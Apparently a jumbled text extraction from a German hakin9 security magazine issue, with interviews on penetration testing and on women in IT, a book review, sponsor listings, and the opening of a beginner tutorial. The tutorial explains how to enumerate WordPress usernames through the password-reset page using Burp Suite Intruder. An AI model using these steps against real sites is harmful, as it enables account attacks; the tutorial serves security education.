gleich mit an-gepriesen werden muumlssen
hakin9 Bereits bei mehreren tausend Tests von Netzen und Systemen haben Sie den selbstentwickelten Security Scanner tajanas genutzt Was unterscheidet tajanas von anderen solchen WerkzeugenTobias Glemser Wir haben tajanas zunaumlchst fuumlr ei-gene Zwecke entwickelt und setzten es auch heute als Basis in Penetrationstests ein tajanas ist ein Frame-
work und Webfrontend fuumlr die grundsaumltzliche Pruumlfung eines Systems mit automatisierten Port- und Vulnera-bility-Scans und einheitlichem Reporting pro System Wir haben dabei das Ziel verfolgt nicht das Rad neu zu erfinden sondern etablierte Programme fuumlr die ei-gentlichen Pruumlfungen zu nutzen Die Ergebnisse der einzelnen Schritte werden analog zu einer manuellen Pruumlfung mit den jeweiligen Programmen automatisiert verknuumlpft Dies ermoumlglicht eine wesentliche schnellere Durchfuumlhrung bei gleicher Ergebnis-Qualitaumlt Daruumlber hinaus ist die Oberflaumlche so gehalten dass nur die not-wendigsten Optionen zur Verfuumlgung stehen
Neben der Schwachstellen-Pruumlfung ist auch eine Erreichbarkeitspruumlfung integriert um einen schnellen Uumlberblick uumlber aktive Systeme in Netzen zu erhalten
Es ist wichtig zu verstehen dass Penetrationstests ohne automatisierte Tests nicht funktionieren Die schie-re Anzahl an Schwachstellen laumlsst sich nur sinnvoll mit entsprechenden Programmen pruumlfen Die Ergebnisse sind dann die Basis fuumlr weitere manuelle Tests Dabei wird mit Know-How und Kreativitaumlt versucht weitere Luumlcken zu finden um und diese dann auszunutzen
hakin9 Wie erfolgt die Bedienung des Scanners und welche Lizenzen und Module existierenTobias Glemser Die Bedienung erfolgt vollstaumlndig uumlber eine webbasierte Oberflaumlche tajanas wird als VM-ware- oder Hardware-Appliance ausgeliefert der End-benutzer kann alle Funktionen ndash dazu gehoumlren auch Ak-tualisierungen ndash uumlber die Weboberflaumlche nutzen Jeder Nutzer erhaumllt natuumlrlich trotzdem vollstaumlndigen Root-Zu-griff auf das System Die Lizenzierung erfolgt pro In-stallation eine Limitierung auf IP-Adressen oder eine gewisse Anzahl Scans erfolgt nicht Neben dem Audit-Modul gibt es auch ein Modul fuumlr die Erreichbarkeits-pruumlfung
hakin9 Woher kommt der Name tajanasTobias Glemser tajanas steht fuumlr bdquothis ainrsquot just ano-ther network scannerrdquo ndash weil es ein wie beschrieben ein
bdquoSicherheit darf nicht erst am Ende von neuen Anwendungen Produkten oder Projekten als Kontrollinstrument einbezogen sondern muss als integraler und vor Allem unterstuumltzender Bestandteil eines erfolgreichen Produkts gesehen werdenldquoInterview mit Tobias Glemser
10201042
INTERVIEW
Nach der Durchfuumlhrung erhaumllt der Kunde einem umfas-senden auf seine Umgebung und Realitaumlt angepass-ten Ergebnisbericht der im Rahmen eines Abschluss-Workshops mit den technischen verantwortlichen besprochen wird Auf Wunsch erfolgt auch die Darstel-lung vor dem Vorstand bzw der Leitungsebene
Das Spektrum eines Penetrationstests ist sehr viel-faumlltig und laumlsst sich nur schwer darstellen Es handelt sich dabei jedoch nicht zwingend um die bdquobekanntenldquo Pruumlfungen auf Serversysteme Haumlufige Einfallstore fuumlr Angreifer sind schlecht gesicherte lokale Netzwerke Client-Systeme oder auch Multifunktionsdrucker Bei Interesse finden sich Informationen z B in der Studie Penetrationstests des BSI dem Whitepaper Penetrati-
onstests der Tele-Consulting oder auch dem Whitepa-per Projektierung der Sicherheitspruumlfung von Weban-
wendungen der OWASP
hakin9 Welche Plaumlne die IT-Sicherheit Branche betreffend haben Sie noch vorTobias Glemser Abseits von technischen Audits ver-suchen wir ganzheitliche Prozesse vor allem aber nicht nur in den IT-Abteilungen zu etablieren und dabei Ad-ministratoren die Hilfestellungen zu geben die sie da-bei benoumltigen Als Sicherheitsberater oder auch Sicher-heitsbeauftrager eines Unternehmens nimmt man meist die Rolle eines Kontrolleurs ein der darauf achtet dass Regeln eingehalten werden Hier ist ein Wandel erfor-derlich sowohl bei denen die sich bdquoSicherheitldquo auf die Fahnen schreiben als auch bei den Administratoren und Verantwortlichen fuumlr Geschaumlftsbereiche und deren Technik Sicherheit darf nicht erst am Ende von neuen Anwendungen Produkten oder Projekten als Kontrollin-strument einbezogen sondern muss als integraler und vor Allem unterstuumltzender Bestandteil eines erfolgrei-chen Produkts gesehen werden Hier muumlssen auch und vor allem Sicherheitsberater umdenken um vorrangig als Unterstuumltzer die sie sind gesehen und akzeptiert zu werden Nur so begreifen die technisch verantwort-lichen Mitarbeiter Sicherheitspruumlfungen nicht als Pruuml-fungen ihrer persoumlnlichen Kompetenz sondern als kon-krete Unterstuumltzung fuumlr die Verbesserung vorhandener Sicherheitsprozesse
Im Bereich der technischen Schwachstellen werden weiterhin Webanwendungen eine groszlige Rolle spielen Daher bin ich seit geraumer Zeit beim Open Web Appli-cation Security Project (OWASP) den meisten vermut-lich durch die OWASP Top 10 bekannt ehrenamtlich taumltig und seit diesem Jahr im Board der deutschen Sek-tion Beim OWASP Stammtisch Stuttgart (und Stamm-tischen in anderen Staumldten) tauschen sich hier auch Menschen rund um das Thema zwanglos aus Wer Lust hat vorbeizukommen kann sich auf der deutschen OWASP Webseite informieren
Wir bedanken uns fuumlr das Gespraumlch
Framework darstellt und nicht den n-ten Port- oder Vul-nerability-Scanner Wenn wir Bugs in den verwendeten Programmen feststellen oder Ideen fuumlr Erweiterungen haben geben wir diese direkt in die Community zuruumlck
hakin9 Wer sind Benutzer von tajanasTobias Glemser Zum einen natuumlrlich wir selbst Zum anderen setzten IT-Sicherheitsbeauftragte und IT-Revi-soren das Tool fuumlr regelmaumlszligige Sicherheitspruumlfungen ihrer Netze ein
hakin9 Fuumlr welche Faumllle reichen Penetrationstests nicht ausTobias Glemser Das haumlngt von der Zieldefinition des Kunden ab und was man unter einem Penetrationstest versteht Bei Tele-Consulting sind alle Mitarbeiter nicht nur in technische Audits wie Penetrationstests eingebun-den sondern auch in prozessorientierte Beratungen und Audits wie z B ISO 27001 oder BSI IT-Grundschutz Dies ermoumlglicht es uns in technischen Audits nicht nur die technischen Luumlcken aufzuzeigen sondern auch auf fehlende oder mangelhafte Prozesse hinzuweisen und konkrete Vorschlaumlge zur Verbesserung zu geben
hakin9 Koumlnnen Sie uns ein konkretes Beispiel nennenTobias Glemser Nehmen wir an dass aus Wirtschaft-lichkeitsgruumlnden nicht alle Server in einem Netz in ein technisches Audit einbezogen werden sondern nur eine definierte Anzahl Stellt man hier Schwachstellen fest so genuumlgt es nicht die erkannten Schwachstellen oder gar Luumlcken zu schlieszligen sondern man muss sich fra-gen wie es zu den Schwachstellen kommen konnte In den seltensten Faumlllen haben hier Administratoren indi-viduelle Fehler gemacht vielmehr scheinen offensicht-lich die Vorgaben zur Serverkonfiguration bzw Haumlrtung nicht ausreichend zu sein bzw diese in ein Information Security Management System (ISMS) integriert zu sein Darauf weisen wir nachdruumlcklich in unseren Ergebnis-berichten hin um eine Gesamtverbesserung zu erzie-len und unterstuumltzen bei Bedarf auch bei der Umset-zung der organisatorischen Anteile
Geht man diesen Schritt nicht werden erfahrungs-gemaumlszlig nur die Systeme veraumlndert bei denen im Test Schwachstellen erkannt wurden Der Verbesserung der Gesamtsicherheit hilft dies dann allerdings nicht
hakin9 Wie sieht eine Sicherheitsuumlberpruumlfung mithilfe des Penetrationstests ausTobias Glemser Zunaumlchst bedarf es einer klaren Ziel-vorstellung Entweder haben Kunden diese bereits oder sie wird im Rahmen eines Workshops gemeinsam erarbeitet Dabei ist es meist sinnvoll mehrstufig vorzu-gehen und die Themen in verschiedenen Arbeitspake-ten abzuarbeiten Im Rahmen eines Kick-Offs werden die Beteiligten informiert und in den Ablauf integriert
10201044
INTERVIEW
hakin9 Lassen Sie uns bitte ein wenig uumlber sich selbst wissen wer sind Sie was machen Sie und wie ist es dazu gekommen dass Sie in der IT-Branche taumltig sindUlrike Peter Ich bin PR-Spezialistin und Journalis-tin durch und durch Die Liebe zum Schreiben ent-deckte ich fruumlh Nach ersten Gehversuchen als freie Mitarbeiterin bei einer Tageszeitung absolvierte ich vor zehn Jahren ein Volontariat in einer PR-Agentur mit parallelem Fernstudium bdquoJournalismusldquo Die ers-ten Tage in der Agentur waren wie ein Kopfsprung ins kalte Wasser Denn obwohl ich das journalistische Ruumlstzeug besaszlig wusste ich anfangs nicht mal wo sich die Escape-Taste an meinem PC befand hatte aber die Aufgabe ohne spezielles Hintergrundwissen uumlber komplexe Technologien detaillierte Berichte zu formulieren Da dies den Ehrgeiz in mir weckte ar-beitete ich mich schnell in die Materie ein und stell-te fest dass Public Relations in Verbindung mit der Erstellung technologischer Texte mein Steckenpferd ist Heute bin ich Geschaumlftsfuumlhrerin meiner eigenen PR-Agentur und obwohl ich mittlerweile auch in wei-teren Branchen und Aufgabengebieten zuhause bin ist die Freude daran bdquotrockeneldquo und komplexe Inhalte lebendig werden zu lassen noch genauso vorhanden wie am ersten Tag
hakin9 Viele glauben dass Computer Maumlnnersache sind Was halten Sie davonUlrike Peter Die landlaumlufige Meinung existiert nach wie vor dass Maumlnner ein besseres technologisches Verstaumlndnis mitbringen Dies resultiert nicht selten aus Vorurteilen laumlsst sich aber auch nicht komplett abstreiten Denn nicht nur Erfahrungswerte sondern auch Belege aus der Hirnforschung zeigen dass Frauen besser mit Sprache umgehen koumlnnen und Maumlnner sich in Naturwissenschaften wohler fuumlhlen Es liegt wohl ein Stuumlck weit in der Natur der Sache
Aber wie heiszligt es so schoumln bdquoAusnahmen bestaumltigen die Regelldquo Und der Trend zeigt beispielsweise dass Frauen zunehmend technische Studiengaumlnge bele-gen
hakin9 Heutzutage sind wir uumlberall von Computern umgeben In der IT-Branche herrscht trotzdem ein Frauenmangel Woran liegt dies Ihrer Meinung nachUlrike Peter Noch lockt es wesentlich mehr Maumlnner in technische Berufe als Frauen Ich denke das Verhaumlltnis wird auch in Zukunft so bleiben ndash auch wenn sich die klassische Rollenverteilung verschiebt und die bdquoGren-
bdquoErfolgreiche Frauen in der IT-Branche - ein Erfahrungsberichtldquo
Interview mit Ulrike Peter
Interview mit Ulrike Peter
hakin9orgde 45
Vorgesetzten und zum anderen nach den Faumlhigkeiten der Frau Jeder Mitarbeiter der neu eingestellt wird steht vor der Aufgabe sich zu beweisen ndash und sollte die Moumlglichkeit dazu erhalten Jedoch werden Frau-en in typischen Maumlnnerberufen oft kritischer beaumlugt und stehen laumlnger auf dem Pruumlfstand Dies passiert teils unbewusst Auch beweisen Studien immer wie-der dass maumlnnliche Arbeitnehmer im gleichen Job mehr verdienen als weibliche Hier macht die Gesell-schaft aber eine Entwicklung durch und dies reguliert sich sicherlich zumindest ein Stuumlck weit im Laufe der naumlchsten Jahre
hakin9 Was macht Ihnen am meisten Spaszlig bei der Arbeit in der IT-BrancheUlrike Peter Bevor ich mich selbstaumlndig machte war ich bereits in einem anderen Unternehmen in der Ge-schaumlftsleitung taumltig ndash jedoch konnte ich den Stift zum Schreiben nie aus der Hand legen Es reizt mich im-mer wieder neue technologische Themen zu erkunden und dabei nicht nur an der Oberflaumlche zu kratzen son-dern Detailtiefe zu erlangen um fundiert und lesens-wert uumlber ein Thema berichten zu koumlnnen Im Laufe der Jahre habe ich eine starke Affinitaumlt zur IT-Security entwickelt Ich finde es spannend uumlber Sicherheits-luumlcken Verschluumlsselungstechniken und vieles weite-re zu schreiben Daruumlber hinaus macht es mir groszligen Spaszlig IT-Unternehmen durch die richtige PR-Strategie nach vorn zu bringen und entsprechende Maszlignahmen in die Tat umsetzen Beim Kennenlernen eines poten-ziellen Neukunden im ersten Moment manchmal hin-sichtlich der technischen Fachkompetenz unterschaumltzt zu werden und dann schnell durch Know-how zu uumlber-zeugen bestaumltigt mich immer wieder in dem was ich tue
hakin9 Was sollte unternommen werden um die Ressentiments von Frauen gegenuumlber IT-Jobs abzubauenUlrike Peter Ich glaube dem kann man bzw Frau nur entgegenwirken indem sie den Mut hat ihre Interessen zu verfolgen und sie unter Beweis zu stellen Aus Er-fahrung wenn jemand seine Faumlhigkeiten zeigt und en-gagiert an eine Sache herangeht ruumlckt das Geschlecht automatisch in den Hintergrund
Wir bedanken uns fuumlr das Gespraumlch
zenldquo in beide Richtungen mehr und mehr verschwim-men Denn auch Maumlnner finden wir heute in Berufen die vor Jahren ausschlieszliglich Frauen zugeordnet wur-den Und wir sind zwar von elektronischen Geraumlten wie PCs Smartphones etc umgeben und diese werden auch rege von beiden Geschlechtern genutzt ndash aber ei-nen technischen Job zu ergreifen ist ein anderes paar Schuhe Hierzu gehoumlrt ein besonderes Faible Die Be-weggruumlnde weshalb in diesem Segment Frauenman-gel herrscht sind meiner Meinung nach Ihnen fehlt manchmal der Mut sie erhalten nicht immer die glei-chen Chancen oder ndash und das wird der Hauptgrund sein ndash es liegen schlichtweg die Interessen in anderen Be-reichen
hakin9 Woraus resultieren die Vorurteile gegen die Frauen die sich mit Computern beschaumlftigenUlrike Peter Die IT ist (und bleibt es sicher auch) eine Maumlnnerdomaumlne ndash Frauen in der IT-Branche sind Para-diesvoumlgel Wie in allen Berufen in denen seit jeher ein Geschlecht etabliert ist sich Prozesse eingeschliffen und bewaumlhrt haben ist es erst einmal fremd und ge-woumlhnungsbeduumlrftig wenn sie sich veraumlndern So liegen die Vorurteile zum einen daran dass es nicht uumlblich ist wenn Frauen in diesen Berufen arbeiten und Maumlnnern die bdquoTechnikldquo zugeordnet wird ndash zum anderen resultie-ren sie daraus dass die unterschiedlichen Faumlhigkeiten und Interessen der Geschlechter einfach naturgege-ben sind So wie kleine Jungen mit Autos spielen und Maumldchen mit Puppen stecken auch spaumlter gewisse Verhaltensweisen und Interessen in uns die bereits in der Kindheit gepraumlgt werden Greift das weibliche Ge-schlecht im Berufsleben ploumltzlich zum bdquoAutoldquo so ist dies ungewoumlhnlich und wird erst einmal hinterfragt
hakin9 Wie sieht die Situation von Frauen in der IT-Branche aus Ist es leicht als begabte IT-Expertin einen Job in einem Unternehmen zu bekommenUlrike Peter Frauen in der IT-Branche sind haumlufig in Marketingabteilungen zu finden ndash aber zum Beispiel auch bei der schreibenden Zunft in Fachverlagen In diesen Jobs herrscht in meinen Augen Chancengleich-heit Als IT-Expertin in einem technischen Beruf wie Ad-ministrator Entwickler oder Aumlhnliches sieht es dagegen anders aus In diesem Segment haben es weibliche Fachkraumlfte meiner Ansicht nach schwerer Die Huumlrde zum Bewerbungsgespraumlch eingeladen zu werden ist houmlher Bekommt sie die Chance dazu wird vielleicht et-was genauer hingeschaut aber letztlich zaumlhlt die Kom-petenz die unterm Strich den entscheidenden Aus-schlag geben wird
hakin9 Wie werden Frauen von Maumlnnern als ihre Mitarbeiter wahrgenommenUlrike Peter Dies laumlsst sich nicht pauschalisieren und richtet sich zum einen nach der Einstellung des
10201046
REZENSIONEN
Das Buch SAP for DFPS Implementierung und Customizing basiert auf mehr als 20 Jahren Er-fahrung die die Autoren insgesamt bei der Ent-
wicklung Implementierung aber auch Schulung der Loumlsung sammeln konnten
Die uumlber 650 Seiten vollgepacktes Wissen sollten sie nicht abschrecken dieses Buch in die Hand zu nehmen Es ist sehr gut und fluumlssig geschrieben Man schafft es sollten sie ein schneller LeserIn sein in zwei Tagen
Sie benoumltigen keine tiefgreifenden SAP-Kenntnisse zum Verstaumlndnis daher ist es fuumlr Entscheider genauso geeignet wie fuumlr Projektleiter Architekten funktionale Mitarbeiter Basismitarbeiter oder externe Berater
Komplexe Zusammenhaumlnge werden sehr schoumln und bildhaft beschrieben damit auch fuumlr den SAP-Laien das Vorgehen verstaumlndlich beschrieben wird Erwaumlh-nenswert finde ich in diesem Zusammenhang Rubiks Zauberwuumlrfel
Das Buch ist sehr strukturiert aufgebaut und umfasst unverzichtbare Grundlagen in den Teilen I-IIIFuumlr Experten wird es dann in Teil IV richtig spannend und interessant
Die von SAP entwickelte fast eierlegende Wollmilch-sau erfordert ein umfangreiches Nachschlagewerk zur Implementierung Den Autoren ist dies hiermit gelun-gen
Ihnen ist es auszligerdem gelungen aufzuzeigen wie komplexe bdquoUnternehmensstrukturenldquo bewaumlltigt und Kos-ten reduziert und kontrolliert werden koumlnnen
Das Beispielprojekt bdquoTsunamildquo verdeutlicht dabei an einem nicht so komplexen Projekt die Anforderungen Beleuchtet wird zB wie militaumlrische Kernprozesse wie etwa die Logistik substanzielle Einsparungen von ca 30 erzielen koumlnnten als auch die Unterstuumltzung von Einsaumltzen verbessert werden koumlnnten (Beschleunigung der Verlegung um bis zu 50 -70)
Des Weiteren wird die Interoperabilitaumlt sehr schoumln he-raus gestellt und die integrativen Aspekte stets im Blick behalten
Hervorheben sollte man die organisatorische Flexi-bilitaumlt und Logistik wie das Logistic Assessment Pro-zessmanagement Qualification Management inkl der Uumlbernahme von Trainingsdaten das Managementkon-zept BSC (Balanced Scorcard) die Einsatzmoumlglichkei-ten von mobilen Anwendungen fuumlr Schutzaufgaben SOA und NCW bzw NetFuumlOp mit DFPS
Der Mehrwert wird zB am Meldewesen der NC3A durch Automatisierung von weiten Teilen schoumln heraus gearbeitet
Die ausfuumlhrlichen bebilderten Beispiele stellen eine gelungene Verbindung zwischen Theorie und Praxis bzw Anwendung dar In der SAP-typischen Struktur wurden die neuen und bereits erwaumlhnten Funktionen sinnvoll und gekonnt integriert
Des Weiteren findet sich fuumlr die richtige IT-Architektur ein schoumln gefuumlllter Werkzeugkasten mit den dazuge-houmlrigen Dorsquos and Dontrsquos Natuumlrlich darf auch das best practices nicht fehlen sowie der Ausblick auf zukuumlnftige Entwicklungen
Egal ob sie sich fuumlr eine Neuintegration oder eine Co-re2Defense Loumlsung entscheiden
die Kapitel zu den Themen
moumlchte ich ihnen unbedingt ans Herz legen
FAZITDieses Buch sollte keinem Entscheider und IT-Verant-wortlichen vorenthalten werden
Praumldikat besonders empfehlenswert
Autor Nicole Huck
SAP for DFPSImplementierung und CustomizingGalileo Press Bonn 20101 Auflage 2010AutorenBernhard EscherichHeinrich PfriemerWolfgang Ullwer
Datenschutz ist EU-weit gesetzliche Anforde-
rung Wir sorgen fuumlr die Erfuumlllung rechtlicher
Vorschriften und kuumlmmern uns um ein ange-
messenes Datenschutzniveau in Ihrem Unter-
nehmen auch international
wwwblossey-partnerde
Recommended Sites
Securitymanagerde ist eine Produktion des
Online-Verlag FEiG amp PARTNER Seit dem
Start hat sich Securitymanagerde zu einem
fuumlhrenden Online-Informationsportal in
Deutschland entwickelt und versteht sich als
unabhaumlngiger Informationsdienstleister der
IT- und Information-Security-Branche
wwwsecuritymanagerde
Pericom base camp IT-Security Unser Ziel ist
es unsere Kunden vor moumlglichen Gefahren
fuumlr Ihre IT-Infrastruktur bestmoumlglich zu schuumlt-
zen Neben der Analyse von Risikopotentia-
len durch Security Audits bieten wir durch
die Implementierung von Security-Loumlsungen
Schutz vor konkreten Gefahren
wwwpericomat
Happy-Security ist ein neues Portal mit Secu-
rity-Challanges IT-Quiz Web-Bibliothek Multi-
media-Center amp vielen weiteren Features
wwwhappy-securityde
CloudSafe stellt seinen Nutzern eine Plattform
zur kryptographisch sicheren Ablage und Verwal-
tung von sensiblen Daten zur Verfuumlgung Nutzer
koumlnnen auf CloudSafe beliebig viele Dokumente
in virtuellen Safes ablegen Es koumlnnen weite-
ren Personen individuelle Zugriffsrechte auf die
Safes eingeraumlumt und somit ein sicherer Daten-
austausch ermoumlglicht werden
wwwcloudsafecom
AV-Comparatives geht hervor aus dem Inns-
brucker Kompetenzzentrum und gilt als eines
der bekanntesten unabhaumlngigen Testhaumluser
fuumlr Antiviren-Software
wwwav-comparativesorg
Die Seed Forensics GmbH bietet fuumlr Strafver-
folgungsbehoumlrden professionelle Unterstuumltzung
in den Bereichen der Datensicherstellung und
Datentraumlgerauswertung Selbstverstaumlndlich
entsprechen unsere Mitarbeiter unser tech-
nisches Equipment und auch unsere Raumlumli-
chkeiten den notwendigen Anforderungen
wwwseed-forensicsde
Wollen Sie Ihre Seite empfehlen kontaktieren Sie bitte dehakin9org
Die Netzwerktechnik steht auf wwweasy-ne-
tworkde im Mittelpunkt Artikel Tutorials und
ein Forum bieten genuumlgen Stoff fuumlr kommende
wwweasy-networkde
Computerfreaks houmlher schlagen laumlsst Geek
Wear mit intelligenten Spruumlchen eine riesige
Auswahl Gadgets und natuumlrlich auch viele
Hacker Tools
wwwgetDigitalde
Recommended Companies
SEC ConsultSEC Consult ist der fuumlhrende Berater
fuumlr Information Security Consulting in
Zentraleuropa Die vollstaumlndige Unab-
haumlngigkeit von SW- und HW-Herstellern
macht uns zum echten Advisor unserer
Kunden Unsere Dienstleistungen umfa-
ssen externeinterne Sicherheitsaudits
(Web-) Applikationssicherheit (ONR 17-
700) Sicherheitsmanagement-Prozesse
(ISO 27001) etc
wwwsec-consultcom
SEC Consult
Tele-Consulting GmbH
Sicherheit hakin9 und crsquot Autoren jah-
relange Erfahrung bei der Durchfuumlhrung
von Penetrationstests und Security-Au-
dits eigener Security Scanner bdquotajanasrdquo
Sicherheitskonzepte Risikoanalysen
ISO 27001-Auditoren VoIP-Planung
und -Security
wwwtele-consultingcom
B1 SystemsDie B1 Systems ist international taumltig
in den Bereichen LinuxOpen Source
B1
Systems spezialisiert sich in den Be-
reichen Virtualisierung und Cluster
infob1-systemsde
wwwb1-systemsde
Blossey amp Partner
Consulting DatenschutzbuumlroDatenschutz ist EU-weit gesetzliche An-
forderung Wir sorgen fuumlr die Erfuumlllung
rechtlicher Vorschriften und kuumlmmern
uns um ein angemessenes Daten-
schutzniveau in Ihrem Unternehmen
auch international Wir erledigen alle er-
forderlichen Aufgaben die Faumlden behal-
ten Sie in der Hand Nutzen Sie unser
Erstberatungsgespraumlch
wwwblossey-partnerde
secXtreme GmbHschuumltzt Ihre Web-Anwendungen bis
auf Applikationsebene Dazu gehoumlrt
sowohl die Pruumlfung von Applikationen
(Pentests und Code-Reviews) als auch
Beratungsleistungen fuumlr Sicherheit im
Entwicklungsprozess und Schutzlouml-
sungen (Web Application Firewalls) bei
Mittelstand
wwwsec-Xtremecom
Mabunta
spezialisierter und kompetenter Partner
heitsfragen in allen Unternehmens-
bereichen verbinden Wachstum mit
sicherer Kommunikation
Alles in allem- mabunta bdquoone-face-to-
the-customerldquo Ihr Spezialist in Fragen
wwwmabuntade
Recommended Companies
SecureNet GmbH MuumlnchenAls Softwarehaus und Web Application
Security Spezialist bieten wir Expertise
rund um die Sicherheit von Webanwen-
dungen Anwendungs-Pentests Sour-
delines Beratung rund um den Software
Firewalls Application Scanner Fortify
wwwsecurenetde
underground_8
secure computing gmbhWir entwickeln und vertreiben securi-
und Antispam Unsere Loumlsungen sind
hardwarebasiert und werden uumlber Dis-
tributoren Reseller und Systemintegra-
toren implementiert und vertrieben
wwwunderground8com
OPTIMAbit GmbHWir sind Spezialisten fuumlr Entwicklung
und Mobile Applikationen gegen Angriffe
externer und interner Art Unsere Dien-
ste umfassen Audits Code Reviews
Penetrationstest sowie die Erstellung
von Policies Zusaumltzlich bieten wir Semi-
wwwoptimabitcom
m-privacy GmbH
einfach zu bedienen
So praumlsentieren sich die von m-privacy
tesiegel Es bietet als erstes System
weltweit einen kompletten Schutz vor
Online-Spionage Online-Razzien und
gezielten Angriffen
wwwm-privacyde
NESECNESEC ist Ihr Spezialist fuumlr Penetra-
tionstests Sicherheitsanalysen und
cherheitspruumlfungen Ihrer Netzwerke
und Webapplikationen sowie bei Sour-
ce Code Audits Bei Bedarf optimieren
wir Ihre Policy sensibilisieren Ihre
nehmen nach ISO 27001
wwwnesecde
Seed Forensics GmbH
fuumlr Strafverfolgungsbehoumlrden profe-
ssionelle Unterstuumltzung in den
Bereichen der Datensicherstellung
und Datentraumlgerauswertung Selbst-
verstaumlndlich entsprechen unsere
Mitarbeiter unser technisches Equip-
0ment und auch unsere Raumlumlichkeiten
den notwendigen Anforderungen
wwwseed-forensicsde
Protea Networks
Loumlsungen Verschluumlsselung Firewall
ring etc Wir bieten umfassende Bera-
tung Vertrieb von Security-Hard- und
Software Installation und umfangreiche
nings) Protea setzt auf Loumlsungen der
dafuumlr direkten inhouse-Support bereit
wwwproteanetworksde
secadmsecadm ist durchtrainierter Spezialist fuumlr
Airbags ABS und Sicherheitsgurte in der
Mannjahren Erfahrung beraten entwi-
fuumlr Kunden weltweit Der Fokus liegt da-
und Security-Management Risiko-Analy-
se die Sicherheitsberatung Auditing Se-
curity-Leitfaumlden Software-Entwicklung
wwwsecadmde
User Enumeration bei Web-Applikationen
hakin9orgde 7
anders vorgehen er uumlberpruumlft den Login-Mechanismus auf Ausgaben welche den Benutzernamen verraten oder Hinweise darauf geben koumlnnten ob der zum Test angegebene Name ein wahrer Benutzername ist Hin-weise darauf geben Ruumlckgaben wie bdquoDas fuumlr diesen Be-nutzernamen angegebene Passwort ist nicht korrektldquo oder aumlhnliches Gegengepruumlft werden kann dies durch die Eingabe eines fiktiven Benutzers Variiert die Aus-gabe von der obigen so ist es sehr wahrscheinlich dass der zuvor verwendete Name korrekt war
Ein weiterer Angriffsvektor ist die bdquoPasswort-verges-sen-Funktionldquo Ist solch eine Funktion schlecht ge-schrieben oder ist diese einfach nur zu leichtsinnig dem Benutzer Komfortfunktionen anzubieten koumlnnen fuumlr den Angreifer wichtige Informationen preisgeben werden Eine Fehlkonfiguration bzw leichtsinnige Web 20 Funktion wie die eben angesprochene kann zum Beispiel bei Eingabe der Mailadresse auf der Passwort-Vergessen-Seite mit einem Satz wie bdquoEine Email mit Ihrem neuen Passwort fuumlr den Benutzeraccount ltna-megt wurde erfolgreich an Sie zugestelltldquo antworten wodurch der wahre Benutzer zwar eine Email der An-greifer jedoch auch den Benutzernamen erhaumllt Ist die angegebene Sicherheitsadresse inaktiv oder wird nur sporadisch verwendet so geht diese Email leicht un-ter und der Angreifer kann mit seiner Arbeit fortfahren Ein gutes Beispiel hierfuumlr ist Wordpress Auch in seiner neuesten Version kann uumlber die bdquoPasswort-vergessen-Funktionldquo der Benutzername herausgefunden werden Ein sogenannter Bot-Schutz ist nicht vorhanden so-dass wir das ganze mit einem Webproxy in unserem Fall Burpsuite automatisieren koumlnnen
Durch eine lokale Recherche an einem Wordpress haben wir herausgefunden dass beim Eingeben eines falschen Benutzernamens ein Fehler zuruumlckgegeben wird ERROR Invalid username or e-mail Verwenden wir jedoch den richtigen Benutzernamen erhalten wir ein Check your e-mail for the confirmation link
Passwoumlrter zu merken Oftmals werden zwar viele ver-schiedene Zugangsdaten verwendet durch das haumlufige wechseln werden dann aber eher einfache Passwoumlrter verwendet damit der Benutzer sich diese leicht merken kann
Um einen Zugang zum Benutzerkonto des Anwen-ders zu bekommen sind meist ein Benutzername und ein Passwort noumltig Oftmals fangen hier schon die Pro-bleme an Hat der Angreifer herausgefunden dass sich die Benutzer durch eine Email-Passwort-Kombination anmelden koumlnnen muss er schon mal viel weniger Zeit investieren den Benutzernamen herauszufinden was bei einem Bruteforce-Angriff ein Zeitvorteil sein wel-cher zwischen durchfuumlhrbar und nicht durchfuumlhrbar al-so Erfolg und Misserfolg entscheidet Oftmals reicht al-so schon eine simple Registrierung bei einer Zielseite um die Feinheiten einer Anmeldefunktion herauszufin-den und auszunutzen Kann ein Benutzer seinen Nick-namen frei waumlhlen so sind die Moumlglichkeiten bei einem Bruteforce-Angriff wieder immens sodass der Angrei-fer eine andere Taktik waumlhlen muss Er wird versuchen ohne muumlhsames Durchprobieren von Kombinationen an den Benutzernamen zu kommen oder einen ande-ren Schwachpunkt im System ausnutzen In diesem Artikel werde ich ein paar einfache Moumlglichkeiten dar-stellen um einer Web-Applikation Benutzernamen zu entlocken (User Enumeration) und diese automatisch aufzunehmen
Wie bereits oben beschrieben kann sich der Angrei-fer sofern er dazu berechtigt ist zuerst ein Bild vom Re-gistrierungs- bzw Login-Mechanismus machen Findet er beispielsweiszlige heraus dass der Benutzername eine Mailadresse ist so kann er leicht Suchmaschinen oder Social Networks verwenden um diese herauszufinden Werden frei waumlhlbare Benutzernamen verwendet so faumlllt diese Art von Recherche weitestgehend aus wo-bei natuumlrlich auch hier manchmal ein Gluumlckstreffer da-bei sein kann In so einem Fall wird der Angreifer aber
Abbildung 1 Funktionsweiszlige einfache User Enumeration
Benutzername 1a2a3d4fPasswort sosecret
Benutzername foobarPasswort sosecret
Bruteforce
Benutzername foobarPasswort topsecret
Request Response
Benutzer oder Passwort falsch
Falsches Passwort
Login erforgreich
920108
FUumlR EINSTEIGER
Nun muumlssen wir uns genauer ansehen was zwischen unserem Client und dem Webserver kommuniziert wird Hierfuumlr starten wir Burpsuite und konfigurieren unseren Browser so dass er als Proxy localhost auf Port 8080 verwendet Als naumlchstes wechseln wir in den Proxy-Tab und setzen Intercept auf Off Durch das Deaktivieren dieser Funktion verhindern wir das uns Burpuite bei jedem Schritt fraumlgt ob wir die Daten wirklich zu unse-rem Webserver senden wollen Als naumlchstes besuchen wird unsere Zielseite Wordpress verwendet immer das gleiche Schema httpwwwzielseitedewp-login
phpaction=lostpassword Wir geben absichtlich ei-nen falschen Benutzernamen an und verfolgen wie die
POST-Anfrage und deren Antwort von Burpsuite aufge-zeichnet werden Dort koumlnnen wir unter request -gt pa-
rams unsere gerade eingegebenen und noch weitere Daten betrachten (Abbildung 2)
Als naumlchstes senden wir den Request per Rechts-klick an den Intruder Das Target-Tab lassen wir unbe-ruumlhrt wir werden erst bei den Positions-Optionen aktiv Wir klicken rechts auf bdquoclear $ldquo Als Attacke verwenden wir Sniper Ganz unten im Textfeld sehen wir eine Zeile mit bdquouser_loginldquo Dies sind die Parameter die per POST uumlbergeben werden Ich markiere den zum Test einge-gebenen Benutzername und klicke auf bdquoadd $ldquo (Abbil-dung 3)
Abbildung 3 Der Parameter der veraumlndert werden soll wird markiert
Abbildung 2 Unser POST-Request an Wordpress
User Enumeration bei Web-Applikationen
hakin9orgde 9
